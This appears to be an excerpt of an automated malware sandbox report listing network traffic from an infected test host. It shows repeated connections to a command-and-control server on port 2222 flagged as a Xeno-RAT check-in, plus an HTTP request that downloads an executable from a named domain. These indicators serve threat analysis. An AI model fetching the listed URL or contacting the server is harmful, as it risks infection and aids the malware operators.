                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 87.121.86.205:443 -> 192.168.2.22:49161
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.205:443
                      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49162
                      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49162
                      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49164
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49164
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49168
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49169
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49171
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49171
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49172
                      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49174
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49174
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49175
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49176
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49177
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49178
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49178
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49180
                      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49180
                      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49181
                      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49181
                      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49182
                      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49182
                      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49183
                      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49183
                      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49184
                      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49184
                      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49185
                      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49185
                      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49186
                      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49186
                      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49187
                      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49187
                      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49188
                      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49188
                      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49189
                      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49189
                      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49190
                      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49190
                      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49191
                      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49191
                      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49192 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49192
                      Source: global trafficTCP traffic: 192.168.2.22:49192 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49192
                      Source: global trafficTCP traffic: 192.168.2.22:49192 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49193 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49193
                      Source: global trafficTCP traffic: 192.168.2.22:49193 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49193
                      Source: global trafficTCP traffic: 192.168.2.22:49193 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49194 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49194
                      Source: global trafficTCP traffic: 192.168.2.22:49194 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49194
                      Source: global trafficTCP traffic: 192.168.2.22:49194 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49195 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49195
                      Source: global trafficTCP traffic: 192.168.2.22:49195 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49195
                      Source: global trafficTCP traffic: 192.168.2.22:49195 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49196 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49196
                      Source: global trafficTCP traffic: 192.168.2.22:49196 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49196
                      Source: global trafficTCP traffic: 192.168.2.22:49196 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49197 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49197
                      Source: global trafficTCP traffic: 192.168.2.22:49197 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49197
                      Source: global trafficTCP traffic: 192.168.2.22:49197 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49198 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49198
                      Source: global trafficTCP traffic: 192.168.2.22:49198 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49198
                      Source: global trafficTCP traffic: 192.168.2.22:49198 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49199 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49199
                      Source: global trafficTCP traffic: 192.168.2.22:49199 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49199
                      Source: global trafficTCP traffic: 192.168.2.22:49199 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49200 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49200
                      Source: global trafficTCP traffic: 192.168.2.22:49200 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49200
                      Source: global trafficTCP traffic: 192.168.2.22:49200 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49201 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49201
                      Source: global trafficTCP traffic: 192.168.2.22:49201 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49201
                      Source: global trafficTCP traffic: 192.168.2.22:49201 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49202 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49202
                      Source: global trafficTCP traffic: 192.168.2.22:49202 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49202
                      Source: global trafficTCP traffic: 192.168.2.22:49202 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49203 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49203
                      Source: global trafficTCP traffic: 192.168.2.22:49203 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49203
                      Source: global trafficTCP traffic: 192.168.2.22:49203 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 192.168.2.22:49204 -> 87.120.120.27:2222
                      Source: global trafficTCP traffic: 87.120.120.27:2222 -> 192.168.2.22:49204
                      Source: global trafficTCP traffic: 192.168.2.22:49204 -> 87.120.120.27:2222

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2050110 - Severity 1 - ET MALWARE [ANY.RUN] Xeno-RAT TCP Check-In : 87.120.120.27:2222 -> 192.168.2.22:49170
                      Source: Malware configuration extractorURLs: 87.120.120.27
                      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 87.120.120.27:2222
                      Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: global trafficHTTP traffic detected: GET /sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.stipamana.comConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
                      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.27
